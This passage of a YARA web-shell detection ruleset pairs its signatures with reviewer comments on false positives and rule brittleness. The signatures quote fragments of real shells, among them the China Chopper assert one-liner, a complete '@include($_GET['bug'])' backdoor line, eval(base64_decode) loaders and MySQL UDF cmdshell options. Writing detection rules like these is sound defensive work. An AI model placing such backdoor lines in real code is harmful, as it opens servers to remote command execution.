   		$s0 = ";!+/DRknD7+.\\mDrC(V+kcJznndm\\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl\"dKVcJ\\CslU,),@!0KxD~mKV"
   		$s4 = "\\co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX\"b~/fAs!u&9|J\\grKp\"j"
   	condition:
   		all of them
rule Mithril_dllTest {
   	// Mithril dllTest.dll -- a Windows binary: a password prompt string and
   	// the \dllTest.pdb debug path. Both required; "dllTest" is a generic
   	// project name, so the combination with the prompt is what matters.
   	meta:
   		description = "Webshells Auto-generated - file dllTest.dll"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "a8d25d794d8f08cd4de0c3d6bf389e6d"
   	strings:
   		$s0 = "please enter the password:"
   		$s3 = "\\dllTest.pdb"
   	condition:
   		all of them
rule bin_wuaus {
   	// wuaus.dll -- a Windows binary. Only $s4 is readable text; the other five
   	// look like address-table residue of one particular build rather than
   	// semantic strings. All six are required, so the rule is tight but
   	// brittle: any rebuild or relink of the same code is likely to be missed.
   	meta:
   		description = "Webshells Auto-generated - file wuaus.dll"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "46a365992bec7377b48a2263c49e4e7d"
   	strings:
   		$s1 = "9(90989@9V9^9f9n9v9"
   		$s2 = ":(:,:0:4:8:C:H:N:T:Y:_:e:o:y:"
   		$s3 = ";(=@=G=O=T=X=\\="
   		$s4 = "TCP Send Error!!"
   		$s5 = "1\"1;1X1^1e1m1w1~1"
   		$s8 = "=$=)=/=<=Y=_=j=p=z="
   	condition:
   		all of them
rule peek_a_boo {
   	// peek-a-boo.exe -- a VB6 binary. Five of the six strings are standard
   	// VB6 runtime imports (__vba*, VB5.OLB, EVENT_SINK_Release) present in
   	// essentially every VB6 executable; capGetDriverDescriptionA (video
   	// capture device enumeration) is the only discriminating one. Expect
   	// matches on any VB6 program that enumerates capture devices.
   	meta:
   		description = "Webshells Auto-generated - file peek-a-boo.exe"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "aca339f60d41fdcba83773be5d646776"
   	strings:
   		$s0 = "__vbaHresultCheckObj"
   		$s1 = "\\VB\\VB5.OLB"
   		$s2 = "capGetDriverDescriptionA"
   		$s3 = "__vbaExceptHandler"
   		$s4 = "EVENT_SINK_Release"
   		$s8 = "__vbaErrorOverflow"
   	condition:
   		all of them
rule multiple_webshells_0023 {
   	// c99 lineage super-rule (w, wacking, c99shell, SpecialShell_99): the
   	// $sqlquicklaunch[] array and the "File does not exists" message. Both
   	// required.
   	meta:
   		description = "Semi-Auto-generated  - from files w.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt"
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
   		super_rule = 1
   		was = "_w_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php_SpecialShell_99_php_php"
   		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
   		hash1 = "9c5bb5e3a46ec28039e8986324e42792"
   		hash2 = "d8ae5819a0a2349ec552cbcf3a62c975"
   		hash3 = "9e9ae0332ada9c3797d6cee92c2ede62"
   		hash4 = "09609851caa129e40b0d56e90dfc476c"
   	strings:
   		$s0 = "$sqlquicklaunch[] = array(\""
   		$s1 = "else {echo \"<center><b>File does not exists (\".htmlspecialchars($d.$f).\")!<"
   	condition:
   		all of them
rule multiple_webshells_0013 {
   	// r57 / SnIpEr_SA super-rule: a Russian language-table entry, a fixed
   	// $name= hex literal, and the rst.void.ru domain. "3 of them" with three
   	// strings means all three. NOTE(review): $s0 contains runs of "?" where
   	// non-ASCII text presumably was; as written the literal requires those
   	// question marks themselves. Whether the original files contain "?" or
   	// the text was mangled before the generator saw it is not visible here,
   	// so a miss on $s0 -- which gates the whole rule -- is plausible.
   	meta:
   		description = "Semi-Auto-generated  - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt"
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
   		super_rule = 1
   		was = "_r577_php_php_SnIpEr_SA_Shell_php_r57_php_php"
   		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
   		hash1 = "911195a9b7c010f61b66439d9048f400"
   		hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
   	strings:
   		$s0 = "'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash'," fullword
   		$s1 = "$name='ec371748dc2da624b35a4f8f685dd122'"
   		$s2 = "rst.void.ru"
   	condition:
   		3 of them
rule pws_php_php {
   	// pws.php: the "Input command" label, the cmd text field, and the dir
   	// field pre-filled from passthru("pwd"). Two of three; $s4 is the only
   	// line containing executable code.
   	meta:
   		description = "Semi-Auto-generated  - file pws.php.php.txt"
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
   		hash = "ecdc6c20f62f99fa265ec9257b7bf2ce"
   	strings:
   		$s0 = "<div align=\"left\"><font size=\"1\">Input command :</font></div>" fullword
   		$s1 = "<input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br>" fullword
   		$s4 = "<input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>"
   	condition:
   		2 of them
rule WebShell__PH_Vayv_PHVayv_PH_Vayv_klasvayv_asp_php {
   	// PH Vayv / klasvayv super-rule: Turkish file-manager markup ("Sil"
   	// link, a "Kullan..." placeholder), a fixed-width grey cell, and an image
   	// loaded from aventgrup.net. Two of four; $s5 is plain table markup, so
   	// a hit should include one of the other three.
   	meta:
   		description = "PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php, klasvayv.asp.php.txt"
   		author = "Florian Roth"
   		super_rule = 1
   		hash0 = "b51962a1ffa460ec793317571fc2f46042fd13ee"
   		hash1 = "408ac9ca3d435c0f78bda370b33e84ba25afc357"
   		hash2 = "4003ae289e3ae036755976f8d2407c9381ff5653"
   		hash3 = "4f83bc2836601225a115b5ad54496428a507a361"
   	strings:
   		$s1 = "<font color=\"#000000\">Sil</font></a></font></td>" fullword
   		$s5 = "<td width=\"122\" height=\"17\" bgcolor=\"#9F9F9F\">" fullword
   		$s6 = "onfocus=\"if (this.value == 'Kullan" fullword
   		$s16 = "<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">"
   	condition:
   		2 of them
rule multiple_webshells_0017 {
   	// w / wacking / SsEs / SpecialShell_99 super-rule: entries of the
   	// extension-to-icon map (ext_avi, ext_htaccess) and the "Execute file"
   	// form posting to $surl. One of three suffices.
   	meta:
   		description = "Semi-Auto-generated  - from files w.php.php.txt, wacking.php.php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt"
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
   		super_rule = 1
   		was = "_w_php_php_wacking_php_php_SsEs_php_php_SpecialShell_99_php_php"
   		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
   		hash1 = "9c5bb5e3a46ec28039e8986324e42792"
   		hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
   		hash3 = "09609851caa129e40b0d56e90dfc476c"
   	strings:
   		$s0 = "\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mvi"
   		$s1 = "echo \"<b>Execute file:</b><form action=\\\"\".$surl.\"\\\" method=POST><inpu"
   		$s2 = "\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswd"
   	condition:
   		1 of them
// pHpINJ.php: "News Remote PHP Shell Injection" helper page.
rule pHpINJ_php_php {
	meta:
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		description = "Semi-Auto-generated  - file pHpINJ.php.php.txt"
		hash = "d7a4b0df45d34888d5a09f745e85733f"
	strings:
		$t_title = "News Remote PHP Shell Injection"
		$t_shell = "Php Shell <br />" fullword
		$t_input = "<input type = \"text\" name = \"url\" value = \""
	condition:
		2 of ($t_*)
}
// phpspy-lineage shells (2008.php, 2009mssql.php, phpspy_2005/2006, arabicspy, hkrkoz).
// NOTE(review): $s3 and $s8 look like the method signatures of the widely
// reused PHP "zipfile" class (addFile / unix2DosTime) — on their own they
// would also hit legitimate code that embeds that class. Precision here comes
// from "all of them", i.e. the caller-side lines $s0 and $s9 must be present
// too; do not loosen the condition to "N of them" without re-checking FPs.
rule webshell_2008_2009mssql_phpspy_2005_full_phpspy_2006_arabicspy_hkrkoz {
	meta:
		description = "Web Shell - from files 2008.php, 2009mssql.php, phpspy_2005_full.php, phpspy_2006.php, arabicspy.php, hkrkoz.php"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		super_rule = 1
		hash0 = "3e4ba470d4c38765e4b16ed930facf2c"
		hash1 = "aa17b71bb93c6789911bd1c9df834ff9"
		hash2 = "b68bfafc6059fd26732fa07fb6f7f640"
		hash3 = "40a1f840111996ff7200d18968e42cfe"
		hash4 = "e0202adff532b28ef1ba206cf95962f2"
		hash5 = "802f5cae46d394b297482fd0c27cb2fc"
	strings:
		// caller-side usage of the zip helper (shell-specific)
		$s0 = "$this -> addFile($content, $filename);" fullword
		// generic zip-class signatures (shared with benign code, see note above)
		$s3 = "function addFile($data, $name, $time = 0) {" fullword
		$s8 = "function unix2DosTime($unixtime = 0) {" fullword
		// directory-download loop in the shell
		$s9 = "foreach($filelist as $filename){" fullword
	condition:
		all of them
}
// DefaceKeeper 0.2: defacement persistence script; the nested
// eval(base64_decode(...)) prefix is the strongest of the three anchors.
rule DefaceKeeper_0_2_php {
	meta:
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		description = "Semi-Auto-generated  - file DefaceKeeper_0.2.php.txt"
		hash = "713c54c3da3031bc614a8a55dccd7e7f"
	strings:
		$dk_form  = "target fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>" fullword
		$dk_eval  = "eval(base64_decode(\"ZXZhbChiYXNlNjRfZGVjb2RlKCJhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUW9"
		$dk_image = "<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center"
	condition:
		1 of ($dk_*)
}
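// r57shell: the FTP brute-force helper and the localised status echo are
// present in every listed variant. Fix: the original meta listed three
// sample hashes twice (hash2/hash3, hash4/hash5, hash9/hash10); the list is
// de-duplicated and renumbered so it reflects the ten distinct samples.
// Detection logic (strings and condition) is unchanged.
rule Webshell_r57shell_2 {
	meta:
		description = "Detects Webshell R57"
		author = "Florian Roth"
		reference = "https://github.com/nikicat/web-malware-collection"
		date = "2016-01-11"
		score = 70
		hash1 = "e46777e5f1ac1652db3ce72dd0a2475ea515b37a737fffd743126772525a47e6"
		hash2 = "aa957ca4154b7816093d667873cf6bdaded03f820e84d8f1cd5ad75296dd5d4d"
		hash3 = "756b788401aad4bfd4dbafd15c382d98e3ba079390addb5b0cea7ff7f985f881"
		hash4 = "16b6ec4b80f404f4616e44d8c21978dcdad9f52c84d23ba27660ee8e00984ff2"
		hash5 = "59105e4623433d5bf93b9e17d72a43a40a4d8ac99e4a703f1d8851ad1276cd88"
		hash6 = "1db0549066f294f814ec14ba4e9f63d88c4460d68477e5895236173df437d2b8"
		hash7 = "c6a5148c81411ec9200810619fa5eec6616800a4d76c988431c272bc8679254f"
		hash8 = "59ea6cf16ea06ff47cf0e6a398df2eaec4d329707b8c3201fc63cbf0b7c85519"
		hash9 = "0e0227a0001b38fb59fc07749e80c9d298ff0e6aca126ea8f4ea68ebc9a3661f"
		hash10 = "ef74644065925aa8d64913f5f124fe73d8d289d5f019a104bf5f56689f49ba92"
	strings:
		// FTP connect with the 10-second timeout used by r57's ftp checker
		$s1 = "$connection = @ftp_connect($ftp_server,$ftp_port,10);" fullword ascii
		// localised message table lookup ($lang[..._text98]) followed by the result
		$s2 = "echo $lang[$language.'_text98'].$suc.\"\\r\\n\";" fullword ascii
	condition:
		// size cap avoids scanning large bundles/archives for two short literals
		filesize < 900KB and all of them
}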
// Hex-decoding loader tail ("...<<4)+...eval($d);") of a webshell that hides
// inside a GIF. Single-string rule: the decoder loop itself is the signature.
rule PHP_Cloaked_Webshell_SuperFetchExec {
	meta:
		author = "Florian Roth"
		description = "Looks like a webshell cloaked as GIF - http://goo.gl/xFvioC"
		reference = "http://goo.gl/xFvioC"
		score = 50
	strings:
		$decoder_tail = "else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);"
	condition:
		all of them
}
// phpkit "odd.php": executes the raw POST body via include('php://input')
// instead of eval/system, and says so in its own comments.
rule webshell_phpkit_1_0_odd {
	meta:
		author = "Florian Roth"
		description = "Web Shell - file odd.php"
		date = "2014/01/28"
		score = 70
		hash = "594d1b1311bbef38a0eb3d6cbb1ab538"
	strings:
		$odd_include = "include('php://input');" fullword
		$odd_comment = "// No eval() calls, no system() calls, nothing normally seen as malicious." fullword
		$odd_iniset  = "ini_set('allow_url_include, 1'); // Allow url inclusion in this script" fullword
	condition:
		all of ($odd_*)
}
// XSS Shell C2 backend (save.asp). The misspelling "SEPERATOR" is part of
// the original source and is therefore reproduced exactly in the pattern.
rule xssshell_save {
	meta:
		author = "Yara Bulk Rule Generator by Florian Roth"
		description = "Webshells Auto-generated - file save.asp"
		hash = "865da1b3974e940936fe38e8e1964980"
	strings:
		$xs_rawcmd = "RawCommand = Command & COMMAND_SEPERATOR & Param & COMMAND_SEPERATOR & AttackID"
		$xs_victim = "VictimID = fm_NStr(Victims(i))"
	condition:
		all of ($xs_*)
}
// Laudanum settings.php (WordPress-plugin flavour of the injector toolkit).
// NOTE(review): the rule identifier "settings" is very generic; YARA rule
// names must be unique per compiled set, so merging this file with other
// rulesets may collide. The name is kept here because downstream tooling
// may key on it — rename only together with all consumers.
rule settings : webshell {
	meta:
		author = "Florian Roth"
		description = "Laudanum Injector Tools - file settings.php"
		reference = "http://laudanum.inguardians.com/"
		date = "2015-06-22"
		hash = "588739b9e4ef2dbb0b4cf630b73295d8134cc801"
	strings:
		$lau_port  = "Port: <input name=\"port\" type=\"text\" value=\"8888\">" fullword ascii /* PEStudio Blacklist: strings */
		$lau_rev   = "<li>Reverse Shell - " fullword ascii /* PEStudio Blacklist: strings */
		$lau_files = "<li><a href=\"<?php echo plugins_url('file.php', __FILE__);?>\">File Browser</a>" ascii /* PEStudio Blacklist: strings */
	condition:
		filesize < 13KB and all of ($lau_*)
}
// WinX Shell (HTML front end). NOTE(review): $w_name and $w_author are plain
// text credits, so any file that quotes them — including signature databases
// and this ruleset itself — satisfies "2 of them". Exclude rule/IOC
// repositories from the scan scope or pair with $w_markup when tuning.
rule WinX_Shell_html {
	meta:
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		description = "Semi-Auto-generated  - file WinX Shell.html.txt"
		hash = "17ab5086aef89d4951fe9b7c7a561dda"
	strings:
		$w_name   = "WinX Shell"
		$w_author = "Created by greenwood from n57"
		$w_markup = "<td><font color=\\\"#990000\\\">Win Dir:</font></td>"
	condition:
		2 of ($w_*)
}
// aspydrv: ASP file/SQL manager shell (despite the .php name in the archive).
rule WebShell_php_webshells_aspydrv {
	meta:
		author = "Florian Roth"
		description = "PHP Webshells Github Archive - file aspydrv.php"
		hash = "3d8996b625025dc549d73cdb3e5fa678ab35d32a"
	strings:
		$ad_target = "Target = \"D:\\hshome\\masterhr\\masterhr.com\\\"  ' ---Directory to which files"
		$ad_upload = "nPos = InstrB(nPosEnd, biData, CByteString(\"Content-Type:\"))" fullword
		$ad_paging = "Document.frmSQL.mPage.value = Document.frmSQL.mPage.value - 1" fullword
		$ad_drives = "If request.querystring(\"getDRVs\")=\"@\" then" fullword
		$ad_copy   = "' ---Copy Too Folder routine Start" fullword
	condition:
		3 of ($ad_*)
}
// RkNTLoad.exe loader (UPX-packed).
// NOTE(review): $s1 and $s8 are generic UPX banner strings and $s2..$s7 are
// fragments of the compressed payload, not of the program's own code. The
// rule therefore only matches this exact packed build; a re-pack with a
// different UPX version or options will not trigger it. "all of them" keeps
// the UPX banners from causing false positives on other packed binaries.
rule RkNTLoad {
	meta:
		description = "Webshells Auto-generated - file RkNTLoad.exe"
		author = "Yara Bulk Rule Generator by Florian Roth"
		hash = "262317c95ced56224f136ba532b8b34f"
	strings:
		// generic UPX header text (present in every UPX 1.x packed file)
		$s1 = "$Info: This file is packed with the UPX executable packer http://upx.tsx.org $"
		// compressed-section fragments specific to this build
		$s2 = "5pur+virtu!"
		$s3 = "ugh spac#n"
		$s4 = "xcEx3WriL4"
		$s5 = "runtime error"
		$s6 = "loseHWait.Sr."
		$s7 = "essageBoxAw"
		// generic UPX copyright banner
		$s8 = "$Id: UPX 1.07 Copyright (C) 1996-2001 the UPX Team. All Rights Reserved. $"
	condition:
		all of them
}
// up.jsp uploader: the Spanish source comment about the 640K truncation bug
// is the only anchor, so this is effectively an exact-comment match.
rule webshell_jsp_up {
	meta:
		author = "Florian Roth"
		description = "Web Shell - file up.jsp"
		date = "2014/01/28"
		score = 70
		hash = "515a5dd86fe48f673b72422cccf5a585"
	strings:
		$up_bug_comment = "// BUG: Corta el fichero si es mayor de 640Ks" fullword
	condition:
		$up_bug_comment
}
// reader.asp (FSO shell family): single mailto: anchor from the page footer.
rule FSO_s_reader {
	meta:
		author = "Yara Bulk Rule Generator by Florian Roth"
		description = "Webshells Auto-generated - file reader.asp"
		hash = "b598c8b662f2a1f6cc61f291fb0a6fa2"
	strings:
		$mailto = "mailto:mailbomb@hotmail."
	condition:
		$mailto
}
// WebShell.cgi (Perl/Template-Toolkit shell): the bare filename plus one
// template directive from the directory listing; both must be present.
rule WebShell_cgi {
	meta:
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		description = "Semi-Auto-generated  - file WebShell.cgi.txt"
		hash = "bc486c2e00b5fc3e4e783557a2441e6f"
	strings:
		$cgi_name = "WebShell.cgi"
		$cgi_tmpl = "<td><code class=\"entry-[% if entry.all_rights %]mine[% else"
	condition:
		$cgi_name and $cgi_tmpl
}
// network.php / xinfo.php / nfm.php: shared stylesheet and password input.
rule multiple_webshells_0003 {
	meta:
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		description = "Semi-Auto-generated  - from files network.php.php.txt, xinfo.php.php.txt, nfm.php.php.txt"
		super_rule = 1
		was = "_network_php_php_xinfo_php_php_nfm_php_php"
		hash0 = "acdbba993a5a4186fd864c5e4ea0ba4f"
		hash1 = "2601b6fc1579f263d2f3960ce775df70"
		hash2 = "401fbae5f10283051c39e640b77e4c26"
	strings:
		$css_textbox = ".textbox { background: White; border: 1px #000000 solid; color: #000099; font-fa"
		$inp_pass_de = "<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''"
	condition:
		$css_textbox and $inp_pass_de
}
// cnseay-x: function name is rebuilt from an indexed character table
// ($_P_P[n]); the concatenation prefix is the signature.
rule webshell_webshell_cnseay_x {
	meta:
		author = "Florian Roth"
		description = "Web Shell - file webshell-cnseay-x.php"
		date = "2014/01/28"
		score = 70
		hash = "a0f9f7f5cd405a514a7f3be329f380e5"
	strings:
		$cn_chartable = "$_F_F.='_'.$_P_P[5].$_P_P[20].$_P_P[13].$_P_P[2].$_P_P[19].$_P_P[8].$_P_"
	condition:
		$cn_chartable
}
// ironshell.php: cmd and rename forms built with $me.'?p=...' routing.
rule webshell_ironshell {
	meta:
		author = "Florian Roth"
		description = "Web Shell - file ironshell.php"
		date = "2014/01/28"
		score = 70
		hash = "8bfa2eeb8a3ff6afc619258e39fded56"
	strings:
		$iron_cmdform = "print \"<form action=\\\"\".$me.\"?p=cmd&dir=\".realpath('.').\""
		$iron_rename  = "print \"<td id=f><a href=\\\"?p=rename&file=\".realpath($file).\"&di"
	condition:
		all of ($iron_*)
}
// JspSpy lineage super-rule (31 samples): the "download remote file to
// savepath" handler that every variant carries.
// NOTE(review): $s7 and $s9 are ordinary servlet idioms (FileInputStream on a
// File, request.getInputStream()) and would hit benign JSP on their own; the
// 4-of-7 threshold forces at least two of the JspSpy-specific parameter names
// (savepath/url/downFileUrl) to be present as well. Keep that in mind before
// lowering the threshold.
rule webshell_000_403_807_a_c5_config_css_dm_he1p_xxx {
	meta:
		description = "Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, config.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, myxx.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, u.jsp, xia.jsp, zend.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		super_rule = 1
		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
		hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
		hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
		hash4 = "8b457934da3821ba58b06a113e0d53d9"
		hash5 = "d44df8b1543b837e57cc8f25a0a68d92"
		hash6 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
		hash7 = "14e9688c86b454ed48171a9d4f48ace8"
		hash8 = "b330a6c2d49124ef0729539761d6ef0b"
		hash9 = "d71716df5042880ef84427acee8b121e"
		hash10 = "341298482cf90febebb8616426080d1d"
		hash11 = "29aebe333d6332f0ebc2258def94d57e"
		hash12 = "42654af68e5d4ea217e6ece5389eb302"
		hash13 = "88fc87e7c58249a398efd5ceae636073"
		hash14 = "4a812678308475c64132a9b56254edbc"
		hash15 = "9626eef1a8b9b8d773a3b2af09306a10"
		hash16 = "e0354099bee243702eb11df8d0e046df"
		hash17 = "344f9073576a066142b2023629539ebd"
		hash18 = "32dea47d9c13f9000c4c807561341bee"
		hash19 = "90a5ba0c94199269ba33a58bc6a4ad99"
		hash20 = "655722eaa6c646437c8ae93daac46ae0"
		hash21 = "b9744f6876919c46a29ea05b1d95b1c3"
		hash22 = "6acc82544be056580c3a1caaa4999956"
		hash23 = "6aa32a6392840e161a018f3907a86968"
		hash24 = "591ca89a25f06cf01e4345f98a22845c"
		hash25 = "349ec229e3f8eda0f9eb918c74a8bf4c"
		hash26 = "3ea688e3439a1f56b16694667938316d"
		hash27 = "ab77e4d1006259d7cbc15884416ca88c"
		hash28 = "71097537a91fac6b01f46f66ee2d7749"
		hash29 = "2434a7a07cb47ce25b41d30bc291cacc"
		hash30 = "7a4b090619ecce6f7bd838fe5c58554b"
	strings:
		// JspSpy-specific request parameters and the remote download path
		$s3 = "String savePath = request.getParameter(\"savepath\");" fullword
		$s4 = "URL downUrl = new URL(downFileUrl);" fullword
		$s5 = "if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath))" fullword
		$s6 = "String downFileUrl = request.getParameter(\"url\");" fullword
		// generic servlet I/O — weak on their own (see note above)
		$s7 = "FileInputStream fInput = new FileInputStream(f);" fullword
		$s8 = "URLConnection conn = downUrl.openConnection();" fullword
		$s9 = "sis = request.getInputStream();" fullword
	condition:
		4 of them
}
// Antichat Shell family (plus fatal.php): file download header, command
// textarea and the unix-permission string builder. All five are required.
rule WebShell_Generic_PHP_3 {
	meta:
		author = "Florian Roth"
		description = "PHP Webshells Github Archive - from files Antichat Shell v1.3.php, Antichat Shell. Modified by Go0o$E.php, Antichat Shell.php, fatal.php"
		super_rule = 1
		hash0 = "d829e87b3ce34460088c7775a60bded64e530cd4"
		hash1 = "d710c95d9f18ec7c76d9349a28dd59c3605c02be"
		hash2 = "f044d44e559af22a1a7f9db72de1206f392b8976"
		hash3 = "41780a3e8c0dc3cbcaa7b4d3c066ae09fb74a289"
	strings:
		$ac_dl_header = "header('Content-Length:'.filesize($file).'');" fullword
		$ac_cmd_area  = "<textarea name=\\\"command\\\" rows=\\\"5\\\" cols=\\\"150\\\">\".@$_POST['comma"
		$ac_filetype  = "if(filetype($dir . $file)==\"file\")$files[]=$file;" fullword
		$ac_perm_blk  = "elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} " fullword
		$ac_perm_r    = "$info .= (($perms & 0x0004) ? 'r' : '-');" fullword
	condition:
		all of ($ac_*)
}
// c99 shell: displaysecinfo()/myshellexec() helper calls and the posix_kill
// process-killer line. Any one of these is c99-specific enough on its own.
rule Webshell_c99_4 {
	meta:
		author = "Florian Roth"
		description = "Detects C99 Webshell"
		reference = "https://github.com/nikicat/web-malware-collection"
		date = "2016-01-11"
		score = 70
		hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
		hash2 = "0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092"
		hash3 = "d4424c61fe29d2ee3d8503f7d65feb48341ac2fc0049119f83074950e41194d5"
		hash4 = "5d7709a33879d1060a6cff5bae119de7d5a3c17f65415822fd125af56696778c"
		hash5 = "21dd06ec423f0b49732e4289222864dcc055967922d0fcec901d38a57ed77f06"
		hash6 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
		hash7 = "816e699014be9a6d02d5d184eb958c49469d687b7c6fb88e878bca64688a19c9"
		hash8 = "383d771b55bbe5343bab946fd7650fd42de1933c4c8f32449d9a40c898444ef1"
		hash9 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
		hash10 = "615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966"
		hash11 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
		hash12 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
		hash13 = "a4db77895228f02ea17ff48976e03100ddfaef7c9f48c1d40462872f103451d5"
		hash14 = "1fdf6e142135a34ae1caf1d84adf5e273b253ca46c409b2530ca06d65a55ecbd"
	strings:
		$c99_lsattr  = "displaysecinfo(\"List of Attributes\",myshellexec(\"lsattr -a\"));" fullword ascii
		$c99_ram     = "displaysecinfo(\"RAM\",myshellexec(\"free -m\"));" fullword ascii
		$c99_perl    = "displaysecinfo(\"Where is perl?\",myshellexec(\"whereis perl\"));" fullword ascii
		$c99_handler = "$ret = myshellexec($handler);" fullword ascii
		$c99_kill    = "if (posix_kill($pid,$sig)) {echo \"OK.\";}" fullword ascii
	condition:
		filesize < 900KB and 1 of ($c99_*)
}
// moon.php: MySQL UDF shell (backshell/cmdshell via "create function ... soname").
// The misspelt dirname(_FILE_) is how the sample is written; keep it verbatim.
rule webshell_php_moon {
	meta:
		author = "Florian Roth"
		description = "Web Shell - file moon.php"
		date = "2014/01/28"
		score = 70
		hash = "2a2b1b783d3a2fa9a50b1496afa6e356"
	strings:
		$moon_udf     = "echo '<option value=\"create function backshell returns string soname"
		$moon_pathbox = "echo      \"<input name='p' type='text' size='27' value='\".dirname(_FILE_).\""
		$moon_netuser = "echo '<option value=\"select cmdshell(\\'net user "
	condition:
		2 of ($moon_*)
}
// China Chopper (caidao) one-liner disguised as a 404 page: assert() is
// rebuilt from 'a`s`s`e`r`t' and fed $_POST[ice].
rule webshell_caidao_shell_404 {
	meta:
		author = "Florian Roth"
		description = "Web Shell - file 404.php"
		date = "2014/01/28"
		score = 70
		hash = "ee94952dc53d9a29bdf4ece54c7a7aa7"
	strings:
		$caidao_assert = "<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('St"
	condition:
		$caidao_assert
}
// FeliksPack3 2005.asp: file-copy popup and the hidden dbname field.
rule FeliksPack3___PHP_Shells_2005 {
	meta:
		author = "Yara Bulk Rule Generator by Florian Roth"
		description = "Webshells Auto-generated - file 2005.asp"
		hash = "97f2552c2fafc0b2eb467ee29cc803c8"
	strings:
		$fp_copy_popup = "window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp"
		$fp_dbname     = "<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">"
	condition:
		$fp_copy_popup and $fp_dbname
}
// GFS web-shell 3.1.7 / nshell / gfs_sh: uname banner, fread loop and the
// user/uid/gid echo shared by the three variants.
rule multiple_webshells_0021 {
	meta:
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		description = "Semi-Auto-generated  - from files GFS web-shell ver 3.1.7 - PRiV8.php.txt, nshell.php.php.txt, gfs_sh.php.php.txt"
		super_rule = 1
		was = "_GFS_web_shell_ver_3_1_7___PRiV8_php_nshell_php_php_gfs_sh_php_php"
		hash0 = "be0f67f3e995517d18859ed57b4b4389"
		hash1 = "4a44d82da21438e32d4f514ab35c26b6"
		hash2 = "f618f41f7ebeb5e5076986a66593afd1"
	strings:
		$gfs_uname = "echo $uname.\"</font><br><b>\";" fullword
		$gfs_fread = "while(!feof($f)) { $res.=fread($f,1024); }" fullword
		$gfs_ids   = "echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()"
	condition:
		2 of ($gfs_*)
}
// bug (1).php: remote/local file inclusion backdoor in one line —
// @include($_GET['bug']); — nothing else is needed to trigger.
rule webshell_PHP_bug_1_ {
	meta:
		author = "Florian Roth"
		description = "Web Shell - file bug (1).php"
		date = "2014/01/28"
		score = 70
		hash = "91c5fae02ab16d51fc5af9354ac2f015"
	strings:
		$rfi_include = "@include($_GET['bug']);" fullword
	condition:
		$rfi_include
}
// nst / cybershell / img / nstview family: rto POST parameter, the shared
// stylesheet colour and the path-normalisation line.
rule multiple_webshells_0027 {
	meta:
